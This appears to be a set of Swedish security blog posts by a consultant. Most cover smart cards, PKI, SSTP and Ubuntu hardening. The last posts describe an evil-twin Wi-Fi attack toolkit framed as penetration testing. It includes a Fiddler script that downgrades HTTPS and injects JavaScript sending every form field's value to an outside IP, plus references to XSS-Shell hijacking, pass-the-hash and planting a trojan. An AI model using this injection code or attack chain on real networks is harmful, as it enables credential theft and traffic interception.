I går hade vi en fantastisk session om WLAN osäkerhet/säkerhet vi trodde att det inte skulle bli så mycket folk i och med att det var väldigt tidigt på morgonen, nämnligen kl 08.30, men vi hade mycket fel och salen vart så full att folk stod längst bak och trängdes för att få lyssna och se
Här kommer några av de kommentarer som folk lämnade i sina utvärderingar:
"Again Hasian and Marcus deliever an excellent presentation on the weakness of commonly deployed Wireless scenarios and what tools can be utilized to attack them and secure them. Again why we should have the truesecurity folks back each year. "
"AMAZING!!!! Genius!!!! I think I am becoming a groupie. I want a security track with these guys every session, every day, for all 4 days. There is so much knowledge on how and what we need to do to fix our bad ways and habits that we need to hear more. I want more. I went to the Microsoft CSO event, and they should have presented at it. We need to hear this and get a better understanding."
"mark and the "wolf" were beyond execelent. A must see for any person concerned about security"
"Please Microsoft, bring these guys back next time, give them more sessions, send them to Australia to do talks!"
/Hasain
I måndags hade vi en heldag/4 session preconf om hur man på olika sätt kunnde bygga säkerhet i systemen, dagen blev mycket lyckad och är just nu etta bland alla andra preconf:ar som varit denna vecka så det känns mycket roligt att folk gillar det vi visat :)
Vi hade ca 200 deltagare under dagen och att dömma av utvärderingen så är de mycket nöjda
/Hasain
Det började med att jag ställde mig i kön till säkerhetskontrollen på Arlanda på väg till Orlando, när det blev min tur plockade jag fram min dator ur första väskan och ställde den på bandet och så fortsatte jag med den andra väskan och började öppna den för att plocka ut mina andra datorer.
Tjejen som stod vid säkerhetskontrollen började nu titta lite förvånat på mig och efter den tredje datorn så kunnde hon inte låta bli att fråga om det fanns flera och jag nickade glatt och fortsatte plocka ut de andra.
6 stycken blev det totalt på bandet pluss mina två väskor, jag promenerade sedan själv under bågen då kom frågan från en av killarna på säkerhetskontrollen: Är du datorförsöljare :)
När jag väl var framme i Orlando och efter like köande på första passkontrollen så säger killen bakom disken, efter fingeravtryck och bild och ett litet förhör om allt möjligt speciellt när han förstod att jag var född i Irak, att jag får plocka mitt bagage och gå till den andra kontrollen och där kan jag få tillbaka passet.
Nu hade jag alla mina väskor med mig och blev hänvisad till en plats där det stod en kille med mina papper och väntade på mig, welcome sir, can you please put your bags here, did you packed your bags?... åh nej hoppas han inte säger öppna den där med alla datorer för då lär det bli en lite längre förhör om varför så många och jag är bara för trött efter den långa flygningen.
Han fattade tycke för min stora väska och i den så fanns det lite kläder och alla kablar och eladaptrar och killen nöjde sig inte förrän han fick en komplett redogörelse om vem jag var och vad jag skulle i detta land och allt antecknades noga av en korrekt och artig tjänsteman.
Hoppas hemresan blir lika lugn och att även de här skulle fråga om jag var datorförsäljare ;)
Från Orlando
Hasain
Vi har nu färdigställt ett verktyg för hantering av Admin & User PIN/Code på Minidriver baserade kort, verktyget släpps som GPL och är tänkt att kunna användas för hantering av mindre mängder kort.
Varför ett sådant verktyg? Vi anser att detta borde funnits i Base CSP:n från början på samma sätt som pintool och motsvarande verktyg i Vista/2008.
Ni får självklart sprida vidare och framtida uppdateringar kommer dessutom att finnas tillgängligt för nedladdningar från www.labcenter.se
Användning:
----------------------------------------------------------------------------
scUtil.exe, version 1.0, Author: Bjorn Osterman, Company: TrueSec AB, Sweden
syntax: scUtil.exe unblockpin <adminkey> <newpin>
scUtil.exe changepin <oldpin> <newpin>
scUtil.exe changeadminkey <oldadminkey> <newadminkey>
scUtil.exe calculateresponse <adminkey> <challange>
scUtil.exe generaterandomkey
<adminkey> is one the the following alternatives:
- 48 hexadecimal characters
- "default", representing 48 zeroes
- "random", representing 48 random hexadecimal characters
<pin> is variable-length string composed of alphanumerical characters
---------------------------------------------------------------------------
/Hasain
Under den tid som minidriver-baserade smartkort har funnits så har det varit ganska jobbigt att hantera admin/user pin på dessa kort om man inte haft tillgång till produkter och ramverk så som CLM.
Jag tycker att det är en "mänskligrättighet" att kunna hantera koder på ett smartkort för den som äger kortet; med en massa tjat från mig och mycket arbete från min kollega Björn Österman så kommer det snart att finnas ett verktyg för ganska komplett hantering av admin/user pin på minidriver-baserade kort. Verktyget kommer att finnas för nedladdning från LabCenter webben www.labcenter.se, dessutom kommer den att vara Open Source.
Man kommer att kunna unblocka ett kort med tillgång till admin pin, byta pin, byta admin pin samt använda den till att skapa svaret på den utmaning man får från pintool.exe i XP och Vista i då en användare vill unblocka sitt kort.
scUtil.exe unblockpin <adminkey> <newpin>
scUtil.exe changepin <oldpin> <newpin>
scUtil.exe changeadminkey <oldadminkey> <newadminkey>
scUtil.exe calculateresponse <key> <challange>
Ingen har väl missat att Windows Server 2008 kommer med ett nytt VPN protokoll, SSTP är Microsofts svar på alla SSL vpn som finns där ute. Ett trevligt sätt att köra VPN som desutom är ganska flexibelt ur många aspekter.
Under de tester jag gjort med SSTP så kan jag konstatera att SSTP klienten kräver en fungerande CRL eller möjlighet att kontrollera att server certifikatet inte är ogiltig. Kravet blir extra uppmärksammat om server certifikatet kommer från en intern PKI där CRL:er inte finns utanför den interna miljön.
Efter lite sökande så hittade jag följande KB http://support.microsoft.com/kb/947054 som beskriver de registry nycklar som finns i den nya RRAS tjänsten i WS2008 och en av dessa är särskilt intressant då den kan användas för att stänga av CRL kontrollen på SSTP klienten.
Jag har personligen fastnat för SSTP, och det givetvis med certifikat för autentiseringen på klienten samt full verifering av server certifikatet.
/Hasain
Det verkar som att hela dataföreningens medlemslista samt uppgifter om lösenord nu finns tillgängliga på nätet. Är du drabbad och dessutom använder sama eller delvis samma lösenord på flera plater så är det väldigt aktuellt att byta dina lösenord, det är bara fråga om tid innan alla som laddat ner listan har samtliga lösenord!
Efter lite googlande och testande och ett och en och annan %!@£$! så kan jag säga att den fungerar mycket bra i Ubuntu.
Hela historien är att jag för ett tag sedan ficka mitt mobiltbredband från Telenor uppgraderat och då skickade Telenor en ny Option GlobeSurfer Icon 7.2 usb-modem till mig. Till min förvåning så upptäcker jag att det är ett sådant usb-modem med ZeroCD (TM) dvs. den växlar mellan att vara usb-minne och modem beroende på vilken drivrutin du har i maskinen. Till det nya modemet så fanns det bara Windows drivrutiner och på Telenors hemsida så utlovades drivrutiner till Windows och OS X, inget tal om linux.
Jag testade givetvis att ansluta modemet till min maskin och konstaterade att den funkade som usb-minne så den vart lagd på lite is tills mer tid finns att undersöka saken.
Efter lite testande så kan jag konstatera att det som behövs för att få den att funka i Ubuntu, just nu kör jag 7.10 x64 på en HP 8510w, är att du laddar ner och kompilera ett verktyg vid namn USB_ModeSwitch http://www.draisberghof.de/usb_modeswitch/ kopiera binären till /usr/sbin eller /sbin, sedan kopierar du usb_modeswitch.conf som följer med till /etc
Nu skapar du en fil i /etc/udev/rules.d, jag kallade den 99-telenor.rules.
Filen 99-telenor.rules skall innehålla följande rad
BUS=="usb", ATTRS{idVendor}=="05c6", ATTRS{idProduct}=="1000", RUN+="/usr/sbin/usb_modeswitch"
Om du som jag har en Option GlobeSurfer Icon 7 är det bara att tuta och köra, men om du har du en annan så ska du ansluta den innan ändringen ovan och köra lsusb som ger dig ett resultat i stil med
Bus 007 Device 031: ID 05c6:1000 Qualcomm Inc
Bus 007 Device 001: ID 0000:0000
Bus 006 Device 001: ID 0000:0000
du tar de id:n som står efter ID med : mellan och skriver in de i raden ovan som idVendor och idProduct.
Nu borde du kunna ansluta ditt modem och den växlar till modem läge automatisk, ladda ev. om udev om de behövs!
/Hasain
Windows Vista och Windows Server 2008 har som bekant gjort det möjligt att använda certifikat för Smart Card Logon utan kraven på UPN och EKU i certifikaten. Denna möjlighet har nu kommit till Windows Server 2003, inte fullt så felxibelt som i Vista / 2008 med en bra början.
För en tid sedan så blev jag inblandad i ett projekt med fokus på smartkort, vi har sedan dess genomfört en massa olika tester av kort, läsare, csp:er och en massa kobinationer av utgivare och verktyg för att kunna hantera olika kombinationer.
Att använda sig av en extern CA för smart card logon var en av de tester som vi hade på vår lista, med utgångspunkten i KB:n på http://support.microsoft.com/kb/281245 så kunnde vi konstatera att det inte var så flexibelt som man önskade sig men efter lite sökande så hittade jag följande KB på http://support.microsoft.com/kb/936358, en patch till Windows Server 2003 som tar bort kravet på EKU!
Efter att ha ringt supporten och fått patchen så var det tid att installera och testa den, sagt och gjort fixades en lämplig DC med CA och en Vista klient. Testerna visade dock inga av de förväntade resultaten så efter lite bollande kunnde jag konstatera att det bara var kravet på EKU som slopades och att kravet på en UPN i certifikatet fanns kvar! Det blev inte riktigt vågen men nästan, en bra början som sagt....
Vill du se detta live och eller diskutera det så kommer jag att visa det under Windows Server 2008 Summiten den 5:e december, vi ses där :)
/Hasain
Så reagerade kunden när jag var färdig med min insats hos de idag!
Det hela började förra veckan då en av mina kunder ringer och frågar varför det går så segt med att köra smart card logon i en Windows XP SP2. Jag har ju gjort detta på annat håll och där var det blixt snabbt, det måste vara något med vår PKI, sa kunden.
Jag hälpte en anna kund för inte så länge sedan att utvärdera olika smartkorttillsammans med ett antal olika CSP:er och smartkortläsare, resultatet blev ganska talande när .net korten var de absolut snabbaste och detta var oavsett vilket läsare man använt, skillnade var upp till ca 50 sec i värsta fall. I procent mätt så pendlade skillnaden mellan 30% och x100% snabbare hantering om kortet som satt i var .net.
Innan du skaffar smartkort för test kolla om du inte kan klara dig med .net korten, de är båda enklare och snabbare att ha i ett Windows baserat system!
/Hasain
Jag skriver detta efter att ha gått igenom alla mina appar som jag hade på min maskin innan uppgraderingen och kan konstatera att det fortfarande funkar bra :)
Jag vet att många tycker att man ska passa på att installera om när en ny version kommer och jag tror jag behöver göra det snart men just nu får det gå med en uppgradering till 7.10 när jag är i mitten av en leverans period och alla mina saker måste funkgera smärtfritt efter helgen.
Har dessutom gjort livet surt för en del hackers som har hållit på o terroriserat en nära vän som bedriver ett forum där åsikterna inte stämmer överens med de hos hackergruppen i frågan, det är kul att ge tillbaka utan att bryta mot några lagar och se hur frustrerade de har blivit.
Jag har fått ett par .net 2+ smartkort med dena nya minidrivern och ska försöka testa dessa under tiden som kommer, det som är mest spännande med de är P11 gränssnittet som borde innebära att korten är mer kompatibla med Uni-kryss. Återkommer med mer information när jag hunnit testa lite.
/Hasain
När man installerar en SBS server så får man med ett self-signed certifikat med flera CN i subject-fältet, detta är ganska praktiskt om man har en server som man vill nå med https och olika namn utan den berömda certifikat varningen.
Om du själv vill skapa ett sådant certifikat med hjälp av din Windows 2003 baserade CA så kan du göra det genom att följa denna instruktion:
- Tala om för CA tjänsten att det är OK att ändra Subject och Alternative Subject Name i ett cert request genom att köra följande kommandon på din CA server:
- certutil.exe -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
- certutil.exe -setreg ca\CRLFlags +CRLF_ALLOW_REQUEST_ATTRIBUTE_SUBJECT
- Starta om Certsvc tjänsten så att inställningarna tas i bruk
- Skapa ett certifikat begärna (cert request), eller använd exempelvis den som kommer från IIS:ens certifikat guide
- Om du vill skapa en egen request baserad på en bef. mall så kan du använda följande steg
- Spara ner filen req.txt (kolla attachements) till din lokala disk
- ändra i den så CertificateTemplate pekar på den mall du vill utgå ifrån
- kör: certreq.exe -new req.txt cert-req.txt
- kör följande kommando för att ändra subject-fältet så att den innehåller flera CN=
- certreq.exe -attrib "CN:localhost\nCN:www.test.com" -submit cert-req.txt new.cer
- Installera certifikatet och koppla den till det nyckelpar som skapats genom att köra: certreq.exe -accept new.cer
- Kör certmgr.msc och titta under private så hittar du det nya certifikatet och kan exportera den tillsammans med nycklarna
/Hasain
En av föredelarna med att köra sin CA på en Windows Server 2003 Ent. Edition är att kunna utfärda certifikat med anpassade inställningar genom att kunna utnyttja v2 certifikat mallar. De flesta som jag har varit i kontakt med vill ha v2 mallar för att utöka giltighetstiden på ett certifikat.
Om man nu inte har en Windows server 2003 Ent. Edition men vill gärna få exempelvis ett smart card logon certifikat att gälla i tre eller fyra år så kan man pröva följande:
- Använd certtmpl.msc för att skapa en kopia av någon av mallarna som finns i lista, ta exempelvis user mallen och skapa en kopia av den
- Justera tiden till önskad inställning, exempelvis 3 år
- Använd adsiedit.msc för att plocka fram den nya mallen som finns under Configuration/Services/Public Key Services/Certificate Templates
- Leta nu efter pKIExpirationPeriod bland attributen för mallen
- kopiera nu värdet av detta attribut, bör linka detta: 00 00 E5 1C BA 84 FB FF
- Plocka fram den v1 mall som du vill utöka tiden på
- Leta nu efter pKIExpirationPeriod bland attributen för mallen
- Editera den och klistra in värden som du kopierade från förra mallen
- Nu har du en v1 mall som gäller i 3 år :)
Din CA kommer inte att tycka att detta är något fel, mallen är ju en v1 mall med lite längre giltighetstid men glöm nu inte att se till att din CA kan utfärda certifikat som gäller mer än standard tiden på 2 år genom at ändra nycklarna
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc
\Configuration\ CA xxx
\
ValidityPeriod
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc
\Configuration\ CA xxx
\
ValidityPeriodUnits
Detta bör fungera utan problem i de flesta system...
/Hasain
Microsoft och Trusted Computer Group
har publicerat ett dokument om standardisering av NAP och
kompatibiliteten med Trusted Network Connect (TNC) arkitekturen. Att
NAP är kompatibel med liknande lösningar på marknaden
är känt sedan tidigare men detta gör att den kommer
att kunna användas i alla system som har stöd för
IF-TNCCS (protokollet som förmedlar SSoH och SoHR till och från
NAP servern) och som väljer att införa den Microsoft
kompatibla IF-TNCCS-SOH varianten.
NAP agenten till Windows XP kommer att
vara en del av SP3 och för de som kör Linux och OSX så
funkar det redan med NAP/NAC klienter från exempelvis Avenda
Systems.
Vill du läsa mer om detta eller
får en bra förståelse om hur NAP funkar så
rekommenderar jag följande dokument från TCG:
https://www.trustedcomputinggroup.org/specs/TNC/IF-TNCCS-SOH_v1.0_r8.pdf
Första gången jag körde Linux var det en hel del saker att tänka på när anslutning till ett nätverk skulle justeras men idag går nästan allt per automatik och en vanlig användare kan lika lätt som i andra GUI-baserade OS byta iställningar på nätverksanslutningen oavsett om det är trådbundet eller trådlöst.
Network Manager heter det lilla verktyget som gör det möjligt att glömma kommandoprompten när man ska hantera sina anslutningar till olika nätverk.
Mitt första intryck är att den funkar bra och är relativt stabil, denna bild varade tills jag började använda WLAN i kombination med Network Manager, och inte alla WLAN utan just där det finns mer än en AP för samma SSID.
Network Manager slutar att fungera efter att man har genomfört ett antal byten mellan olika AP med samma SSID, sk. roaming, den vill bara inte ansluta och ingenting funkar tills man startar om nm-applet delen i Network Manager!
I och med att jag vistas i div. miljöer med mycket WLAN och att jag råkar använda det som min primära anslutning så har jag tröttnat på Network Manager och det ständiga omstartandet av nm-applet och löst mitt problem genom att avinstallera Network Manager och gå tillbaka till CLI-mode :)
Nu funkar det utmärkt att köra WLAN med flera AP, det är dock lite arbete med att ansluta till nya WLAN om man inte varit duktig och förberett lite mallar för olika inställningar ;)
Mitt hacker-jag säger samtidigt att det är bra att OS strular med nätverksanslutningarna så att den kan smyga med lite intressanta aktiviteter :D
/Hasain
PKI finns idag i de flesta tillämpningar som körs under Linux, om stödet inte finns med från början så går det i de flesta gångerna att lägga till det i efter hand och är man lite händig själv så kan man fixa till PKI i det mesta men då får man vara beredd att sätta sig vid tangentbordet själv :)
Efter att ha konstaterat att PKI är ganska supporterad i Ubuntu/Linux, så kom turen till att testa med smartkort. För att smartkort ska funka så behövs en drivrutin till läsaren och CSP programvara som mappar mellan rådande standard och smartkortet. De standard som används i Linux när det gäller smartkort är PKCS11 och korten är antigen PKCS15 eller så emuleras PKCS15 av CSP.
Det finns två projekt som kommit längst i Linux när det gäller smartkort, OpenSC som kan hantera många kort med filsystem och RSA modul är den ena och Musclecard so kan hantera många java-baserade kort är den andra. Jag började med att testa OpenSC och har mer eller mindre fastnat för den ;)
OpenSC klarar av att prata med smartkort och läsare baserade på CT-API, PC/SC och OpenCT. läsaren som jag använder är Gemplus GemPC Twin som är ett USB CCID och kommunicerar med PC/SC. det som behövdes för att få fat på läsaren är libccid(driver för CCID USB Readers), Pcscd(PC/SC Middleware) och OpenSC(PKCS11/15 tools and API) med tillhörande plugins för exempelvis Mozilla.
Om man ska jämföra lite så måste jag säga att jag saknar den kompletta CSP implementationen som ju finns i Windows! I Linux så stödjer alla ett gränssnitt mot PKCS11 men den finns inte i själva OS:et eller på ett automatiserat sätt utan måste pluggas in i varje applikation eller de lav systemet på ett mer eller mindre mauellt sätt. Den manuella aktiviteten är nödvändig i början och allt brukar funka om man byter kort eller läsare givet att det nya kortet och den nya läsaren är kompatibla med systemet.
Jag har testat och kört Smartkort i Firefox samt lokal smartkortlogon i Ubuntu. För Firefox så behöver man manuellt lägga till en modul för att kunna använda smartkortet via OpenSC, efter det så finns kortet och de cert och nycklar för HTTPS/SSL inloggning. Lokalinloggnig med smartkort i Ubuntu var lite mer av ett äventyr, det fanns färdiga PAM moduler men ingen av de funkade, man fick bara ett fel meddelande om att signeringen inte kunnde genomföras, efter lite tester så visade det sig att det meddelande som skickades till kortet för signering var för långt, det är troligtvis en miss i testprocessen där man inte räknat med begränsningar som beror på korten eller mjukvaran runt dessa. Efter en justering och en ny kompilerad pam-modul så funkade det utmärkt :)
Det finns två varianter av smartcardlogon som pam-modul, en som inte genomför någon kontroll av certkedjan och CRL:en och en som följer konstens alla regler och kan automatiskt mappa användare i systemet beroende på egenskaper i det cert som finns på kortet. Den första av dessa funkar fint med selfsigned certfikat och är ganska enkel att sätta upp då man lägger certfikatet i en fil i användarens hemmamapp, vid inloggning kommer pam-modulen att försöka hitta lämpliga nycklar på det kort som sitter i läsaren som matchar certet, den kommer sedan att be kortet signera lite slumpdata för att sedan verifiera signaturen mot det certo och nyckel som finns i användarens hemmamapp.
Smartkortlogon via SSH ska enligt uppgift från Johannes G. funkar bra, har själv inte hunnit testa dett men hoppas kunna återkomma om det.
/Hasain
Det finns en mängd olika guider om hur man ska bete se för att säkra en standard installation av div OS, detta är inte något sådant utan bara min egna tankar om en nyinstallation Ubuntu!
Det finns två frågor att ta ställning till:
- Kan någon komma åt mitt system via nätverket?
Nej, jag kommer inte att exponera några tjänster, och är det så att jag gör det så ska en brandvägg kontrollera vem kan ansluta alternativ ska detta aktiveras vid behov, rent manuellt altså :)
- Kommer jag att köra godtycklig kod på min maskin?
Kanske?! jag kommer nog att surfa lite och så vill man installera lite appar och sånt. Då är det viktigt att inte vara inloggad som root och dessutom vara försiktig vart man tar vägen och vad browsern får göra.
Det första fixar Ubuntu lika snyggt som exempelvis UAC i Vista, det andra fixar vi med lite plugins till firefox som exempelvis noscript och adblock och så fixar vi en hosts fil som tar hand om adresser till kända bråkmakare som reklamsiter och annat smått och gått man inte vill ha kontakt med.
När den gäller säkerheten i filsystemet så SKA filsystemet vara krypterat, om du inte kan ha ett krypterat filsystem så tänk på att skydda single user logon via ett lösenord(MD5) i menu.lst och glöm inte att ställa in rättigheterna ordentligt i filsystemet, detta speciellt om det finns flera olika användare i systemet.
Hosts filer finns det gott om på nätet, prova "mvps hosts" i google, ett händigt skript för att styra brandväggen hittar du bland bifogade filer.
Nästa inlägg kommer att handla om att glömma lösenorden i Ubuntu och börja köra certfikat och PKI.
/Hasain
Jag kör fortfarande Ubuntu på heltid och är rätt så nöjd med resultatet, allt funkar bra och det som inte kan köras i Linux får rulla i VMWare server och man har nu vant sig vid att saker och ting funkar som de gör.
Man har dessutom vant sig vid att vissa personer inte kan låta bli att kommentera när de ser en Linux, har hört många båda mer och mindre glada kommentarer under den tid som varit.
Hur ser min Ubuntu ut?
- Allt utom boot filerna är krypterat detta inkluderar swap partition och annan slask disk.
Krypteringen hanteras av dm-crypt och är rätt smidig att använda. Man kan köra med låååååååååååånga lösenord eller usb-sticka eller i princip vad man vill som hemlighet för dm-crypt. Enda förutsättningen är att den finns tillgänglig tidigt under boot-processen.
Installationen/crypteringen av partitionerna var ganska enkel, man skapar sina råa partitioner, crypt-formaterar dessa och skapar mappningar som sedan används som de partitioner som OS och data installeras till, det går dessutom utmårkt att cryptera swap och liknande partitioner.
Där har Ubuntu en fördel jämfört med Bitlocker i Vista som bara hanterar system-partitionen. Den fördel Bitlocker har är användningen av TPM för att uptäcka om någon har manipulerat med biso eller boot-koden. Så för att komma till motsvarande nivå så har jag ställt in krav på TPM inloggning när min dator startar, detta förhindrar effektivt olovliga försök att starta datorn när jag inte finns i närheten.
Hur hanterar man då en trojaniserad boot-partition? Så som jag ser på saken så finns det två alternativ:
- Lämna aldrig datorn så att någon kan fixa med disken, TPM-lösenordet gör att någon måste plocka ut disken och använda den i en annan maskin för att kunna trojanisera den.
- Använd Drive Lock, disken svarar inte på läs och skriv kommandom om inte rätt lösenord presenteras, detta ger mig möjlighet att veta att ingen kan manipulera min disk under lunchen
Man är ju lagom paranoid och då gäller att inte åter använda några lösenord eller hur, så för att starta min dator så måste jag knappa in minst 3 olika lösenord, ca 45 tecken :)
Ja, jag har konfigurerat autologon i burken, om någon kommer åt den i okrypterat format så hjälper inga lösenord oavsett OS ;)
Hur gör jag med externa diskar? TrueCrypt är mycket trevlig att använda, och fungerar på flertalet OS så jag använder den på mina diskar som ska hålla data som är känsligt.
Tills vi möts i nästa inlägg så röstar jag på Micke Nyströms förslag:
"Jag vill inte ha en monolog, jag vill ha en dialog, men här i Svergie tycks det vara kört, eller?" läs hela inlägget
här.
/Hasain
Sedan några veckor tillbaka så har jag börja köra Ubuntu på heltid, och nej det är inget uppror mot något eller någon utan snarare ett led i ett projekt att testa och utvärdera motsvarigheten till en del säkerhetsfunktioner som jag vet fungerar på ett bra sätt i Windows.
Jag kommer att fokusera på klient-PKI och de tillämpningar som använder PKI till en början och hur detta kan integreras med Windows världen. Jag kommer också att utvärdera användarvänligheten så som en vanlig användare skulle ha sett på saken.
Jag har dessutom lyckats intressera en del av mina arbetskamrater på TrueSec att vara med på detta projekt och jag lovar att jag/vi kommer att posta om det som funkar och inte funkar under resans gång.
Har du några funderingar eller uppslag som rör ämnet så får du gärna höra av dig till mig, det finns inget som är mer spännande än att exprementera :)
/Hasain
Det var ett tag sedan :) så blir det om man inte kan säga nej till alla frågor som väller in från alla håll....
Vi fortsätter vår diskussion och enligt mina noteringar så har turen kommit till att beskriva
den själv konfigurerande "onda" accesspunkten efter att ha haft all infrastruktur på plats.
När andra har gjort en s.k. evil-twin eller fake-ap så har man siktat på att göra allting i egen regi, man skapar en applikation som lyssnar efter datorer som söker sina SSID:n och sätter upp de SSID:n via ett nätverkskort som sätt i AP-mode vilket skapar en del beroenden till platform och hårdvara och till och med versioner av drivrutiner.
Så till skillnad från alla andra så tänkte jag göra livet lite enklare för mig och mina kollegor som ju vill använda detta på ett snabbt och enkelt sätt.
Jag tog ett av de mest använda applikationerna för WLAN-sniffning och ändrade den lite så att den kör ett extern program/skript för varje förfråga på SSID den ser i luften. Det externa programmet konfigurera sedan en helt vanlig accesspunkt med det SSID som just frågats efter och vips så har vi en fake-ap/evil-twin utan att behöva bry sig om att brygga trafiken mellan olika interface eller agera AP osv....
Dessutom så får man andra kvalitativa egenskaper, man är inte längra begränsad till ett nätverkskort i en laptop utan kan köra en riktig AP med bra antenner och få en täckning av både kvantitet och kvalitet och dessutom så är det en baggis att ha flera SSID:n i luften på en och samma gång.
Det modifierade programmet heter airodump och är en del av det gamla aircrack verktygslådan, moddningen av den var ganska enkel och jag gjorde så att den körde ett jscript för att konfigurera om min AP.
Alla moderna AP som finns idag har ett web-ui som kan användas för att ändra inställningar så med lite MSXML i jscript var saken gjord.
Hur funkar det hela då?
Jo...
- man tar en dator, utrusta den med att WLAN-kort som är kompatibel med airodump (atheros chipset)
- man tar en AP, hittar det POST eller GET förfrågan som behövs för att konfigurera ett SSID och justerar jscriptet med den
- koppal ihop datorn och AP så de kan prata IP med varandra
- köra det modifierade airodump (vi kallar den ts-airo ;) ) på datorn
- vänta på de som frågar efter SSID:n
- njut av resultatet ;)
Glöm inte att se till att ha restrerande ifrastruktur på plats så att de som kopplar upp sig till din AP får IP och blir lurade till din Fiddler så att du kan ta hand om deras trafik, hehehehe
Bifogar givetvis ts-airo.exe för de som inte orkar fixa den själva, bifogar även två exemplar av jscriptet för att konfigurera en D-Link och en Cisco Aitonet AP :)
Ett par saker innan vi säger tack för denna gång...
Glöm inte att döpa om ditt ap-config-skript till set_ssid.js, och nej det funkar inte med vbs om du inte kodar om appen ;).
Bifigar även koden för ts-airo då airodump går under GPL så har jag ryggen fri...
och dessutom så vill jag varna för att denna aktivitet kan vara väldigt olagligt om man inte aktar sig så använd verktygen med en dos försiktighet
Vi kommer att presenterar Forefront Security Technology [Client, Server & Edge], Longhorn Server Security, Network Access Protection, Smart Card PKI m.m.
Vi har kastat powerpointpresentationerna och istället demonstrerar vi live på scen hur teknikerna fungerar, så att du kan förbereda dig för morgondagens tekniker redan idag!
Missa inte denna intensiva tekniska heldag, med den senaste tekniken presenterad av Sveriges främsta experter på Microsoft och säkerhet!
På scenen har vi Marcus Murray, Michael Anderberg, Mikael Nyström, Anders Jansson, Johan Blom och vederbörande som presenterar nästa generations säkerhetsteknologier från Microsoft.
Vi se på http://www.securitysummit.se :)
....Som sagt så var det bara att köra igång skapande processen eller kanske plockande processen för det är det det egentligen handlar om, att plocka ihop en massa olika verktyg till att kunna utföra något ordnat med ett visst resultat som följd.
Vi börjar med infrastrukturen som består av följande:
-
En dator, helst bärbar så att man kan vara mobil.
-
En virtuell maskin som hostar våra DHCP, Proxy och DNS-tjänster
-
Möjlighet till en internet anslutning via WLAN eller 3G
-
Ett extra WLAN-interface (pccard) för att hantera avlyssningen
-
Lite fantasi och mycket tid :)
Den virtuella maskinen blev installerad med W2K3 som genast blev av med sin servertjänst och funktionaliteten för netbios och som ersättning fick ett verktyg vid namn Sombi som agera smb server och erbjuder en mycket trevlig variant av passing the ms-chapv2 hash, återkommer om den senare.
Den virtuella maskinen agerar DHCP (W2K3 standard DHCP), HTTP Proxy (Fiddler) samt DNS (Netwox).
Inga konstigheter med DHCP:n den delar ut lite adresser och skickar alla till vår server för såväl DNS som default gateway.
DNS:en fixar vi genom att köra verktyget Netwox och detta för att vi på ett enkelt sätt vill skicka alla till vår server oavsett vad de tänker surfa/ansluta dig till. Med andra ord så är det en i allra högsta grad ond DNS som svarad helt sonika en och samma sak på alla frågor om IP, dvs. den virtuella maskinens IP adress.
För att kunna hantera webtrafiken på ett bra sätt och dessutom kunna plocka ut god bitarna från den så har jag valt att använda Fiddler som en transparent proxy. Fiddler är ett verktyg från MS R&D som kan användas för att felsöka HTTP-flöden och som dessutom går utmärkt att använda för att förändra saker och ting i ett HTTP-flödet. Man kan exempelvis skriva om alla headers i valfri riktning göra sök & ersätt på data och lite annat kul.
Fiddler erbjuder möjligheten att via C# skript komma åt det data som transporteras mellan klienten och servern mycket snyggt och bekvämt ;) så jag fixade ett par funktioner som gör bl.a.
-
Konvertera alla HTTPS-länkar i en sida till HTTP inklusive ev. redirects i headers
-
Injicera ett java script i de sidor som användaren får så att man kan använda ett verktyg vid namn XSS-Shell för att fjärrstyra webbläsaren, man kan till exempel surfa via webbläsaren till exempelvis intranätet över ett VPN...
-
Injicera ett java script i de sidor som användaren får så att man får alla användarnamn och lösenord som matas i olika formulär då formulär data skickas med HTTPS, användaren skriver och texten loggas på vår server mycket snyggt.
-
Injicera lite HTML taggar för bilder som sätter igång en SMB-anslutning så att vi kan genomföra en passing the hash attack
Nedan följer ev kort version av dessa script
---------------------------------------------------------------------------------------
if (m_FWDForms && oSession.oResponse.headers.ExistsAndContains("Content-Type", "html")){
oSession.utilDecodeResponse();
var oBody = System.Text.Encoding.UTF8.GetString(oSession.responseBodyBytes);
var oRegEx = /<\/body[^>]*>/gi;
oBody = oBody.replace(oRegEx, "<img src=\"\" id=\"xxxx-yyyyy\" width=0 height=0></body>");
var oRegEx = /<input/gi;
oBody = oBody.replace(oRegEx, "<input onchange=\"var o = document.getElementById('xxxx-yyyyy'); o.src = 'http://1.1.1.1/'+this.name+'++++'+this.value;\" ");
oSession.utilSetResponseBody(oBody);
}
if (m_NoHTTPS && oSession.oResponse.headers.ExistsAndContains("Content-Type", "html")){
oSession.utilDecodeResponse();
var oBody = System.Text.Encoding.UTF8.GetString(oSession.responseBodyBytes);
var oRegEx = /https/gi;
oBody = oBody.replace(oRegEx, "http");
oSession.utilSetResponseBody(oBody);
}
---------------------------------------------------------------------------------------
Ja, jag bifogar det kompletta fiddler skriptet i denna post, men lämnar inga garantier för vad den gör ;)
Vi fixar givetvis så att vi har internet access via WLAN ;) eller 3G, man vill ju inte att "användaren" ska känna sig blåst på det nät han/hon har hamnat i och söka andra :(
Nu har vi all infrastruktur på plats och nästa steg är at få igång den själv konfigurerande "onda" accesspunkten
Fortsättningen följer…
Länkar till verktygen som nämns i denna post
-
Netwox: http://www.laurentconstantin.com/en/netw/netwox/
-
Fiddler: http://www.fiddlertool.com/fiddler/
-
Sombi: Not Published in Public Yet
Under hösten var jag inblandad i att ta fram en verktygslåda för att i penetrationstestsyfte kunna angripa och utnyttja datorer som är villiga att ansluta sig mot öppna trådlösa nät. Principen för en sådan attack är enkel och kan beskrivas med följande punkter:
1. Avlyssna närområdet med en lämpligt WLAN-sniffer
2. Hitta de datorer som letar efter trådlösa nät de varit anslutna till
3. Sätt upp dessa nät (dynamiskt) med lämpligt infrastruktur
4. Glöm inte att ha lite verktyg för att avlyssna och ev. manipulera trafiken som går via oss
5. Installera en agent(trojan) på den drabbade datorn när man ändå är i farten
Det finns en mängd olika verktyg som kan åstadkomma punkterna ovan men aldrig något som är komplett och erbjuder hela flödet. Det mesta som finns är dessutom ganska begränsad till ett visst OS och viss hårdvara.
Jag fick dessutom ett stycke special önskemål från min kollega Marcus om att man skulle kunna använda Windows som plattfrom för attacken då han ville visa det under IT-Forum 2006.
Utmaningen var alltså att göra något som kan erbjuda hela processen med bibehållen funktionalitet för båda angriparen och offret i scenariot och är dessutom tillräckligt flexibel för att kunna köras på olika plattformar.
